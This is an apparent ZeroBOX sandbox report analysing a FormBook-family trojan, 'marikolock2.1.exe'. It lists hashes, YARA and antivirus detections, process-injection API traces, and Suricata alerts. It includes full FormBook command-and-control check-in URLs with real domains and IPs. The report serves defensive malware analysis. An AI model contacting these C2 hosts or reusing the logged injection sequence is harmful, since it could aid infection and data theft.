popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

marikolock2.1.exe

NSIS UPX Malicious Library PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 28, 2023, 12:40 p.m. Oct. 28, 2023, 12:45 p.m.
Size 472.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 1b4bc7eb054142c70e87755de845e039
SHA256 d0cbf22d6b18d9544e3c1488b363c099a29b698205bcca18a7eb1ae1c92d4343
CRC32 35B64393
ssdeep 12288:1a1rrvMZImfPZl/g7U2l4vW2klU1gQ3sfJ:eroZ3wP6+XrVfJ
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • NSIS_Installer - Null Soft Installer
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
www.ficylkghv.com
www.promushealth.com
A 63.141.242.46
81.17.29.148
www.517912.com
CNAME y.ya-bo888.com
A 38.47.227.76
38.47.227.76
www.uzmayaqoob.com
A 154.49.142.142
CNAME uzmayaqoob.com
154.49.142.142
IP Address Status Action
154.49.142.142 Active Moloch
164.124.101.2 Active Moloch
38.47.227.76 Active Moloch
63.141.242.46 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 38.47.227.76:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 63.141.242.46:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 154.49.142.142:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.517912.com/t6tg/?9r4P2=x+Kv6xpWcNesBkKfTwjNPM0LnGFvN7+CPVZKKdjbvYvOGsJKnhF5jBVeRF44UVI4ghuUdA3c&EjU4Sz=fdMTVRIPlB
suspicious_features GET method with no useragent header suspicious_request GET http://www.uzmayaqoob.com/t6tg/?9r4P2=XP7jkasqkgrWx1C3rIh2LMmDsrx9AEXuv+yJvInbJHFGDwSK0i3nVRBGHVeWBLS+d5Gq1e4Y&EjU4Sz=fdMTVRIPlB
suspicious_features GET method with no useragent header suspicious_request GET http://www.promushealth.com/t6tg/?9r4P2=7tYymCvuwOydaUuPNkovhG/t52+K0Kp+Kp8xcgM9C2uQN+XKa74YZrRvofV08ZJStB5H4sxz&EjU4Sz=fdMTVRIPlB
request GET http://www.517912.com/t6tg/?9r4P2=x+Kv6xpWcNesBkKfTwjNPM0LnGFvN7+CPVZKKdjbvYvOGsJKnhF5jBVeRF44UVI4ghuUdA3c&EjU4Sz=fdMTVRIPlB
request GET http://www.uzmayaqoob.com/t6tg/?9r4P2=XP7jkasqkgrWx1C3rIh2LMmDsrx9AEXuv+yJvInbJHFGDwSK0i3nVRBGHVeWBLS+d5Gq1e4Y&EjU4Sz=fdMTVRIPlB
request GET http://www.promushealth.com/t6tg/?9r4P2=7tYymCvuwOydaUuPNkovhG/t52+K0Kp+Kp8xcgM9C2uQN+XKa74YZrRvofV08ZJStB5H4sxz&EjU4Sz=fdMTVRIPlB
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00550000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d90000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2164
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\umesd.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection Process 2084 called NtSetContextThread to modify thread in remote process 2164
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4321408
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000f4
process_identifier: 2164
1 0 0
Lionic Trojan.Win32.Strab.4!c
MicroWorld-eScan Gen:Variant.Midie.135986
FireEye Generic.mg.1b4bc7eb054142c7
Skyhigh BehavesLike.Win32.Generic.gc
Malwarebytes Malware.AI.2421161474
VIPRE Gen:Variant.Midie.135986
Sangfor Trojan.Win32.Agent.Vgo2
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Variant.Midie.135986
K7GW Trojan ( 005ad2291 )
K7AntiVirus Trojan ( 005ad2291 )
VirIT Trojan.Win32.GenusT.DTHX
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Injector.ETKM
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky UDS:Trojan.Win32.Strab.gen
Alibaba Trojan:Win32/FormBook.26b16eb7
Emsisoft Gen:Variant.Midie.135986 (B)
F-Secure Heuristic.HEUR/AGEN.1337943
DrWeb Trojan.Siggen21.52418
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Injector
GData Gen:Variant.Midie.135986
Jiangmin Trojan.Generic.cfksz
Google Detected
Avira HEUR/AGEN.1337943
Antiy-AVL Trojan/Win32.Injector
Gridinsoft Trojan.Win32.FormBook.bot
Arcabit Trojan.Midie.D21332
ZoneAlarm UDS:Trojan.Win32.Strab.gen
Microsoft Trojan:Win32/Vigorf.A
Varist W32/ABRisk.WEKL-4169
AhnLab-V3 Trojan/Win.MalwareX-gen.R618381
BitDefenderTheta Gen:NN.ZexaF.36792.pyW@aKTUBFai
MAX malware (ai score=81)
DeepInstinct MALICIOUS
VBA32 BScope.Trojan.Strab
Cylance unsafe
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R06CH07JQ23
Rising Trojan.Formbook!8.F858 (TFE:5:qqrzCAtliq)
Fortinet NSIS/Agent.DCAC!tr
AVG Win32:MalwareX-gen [Trj]
Cybereason malicious.3d2371
Avast Win32:MalwareX-gen [Trj]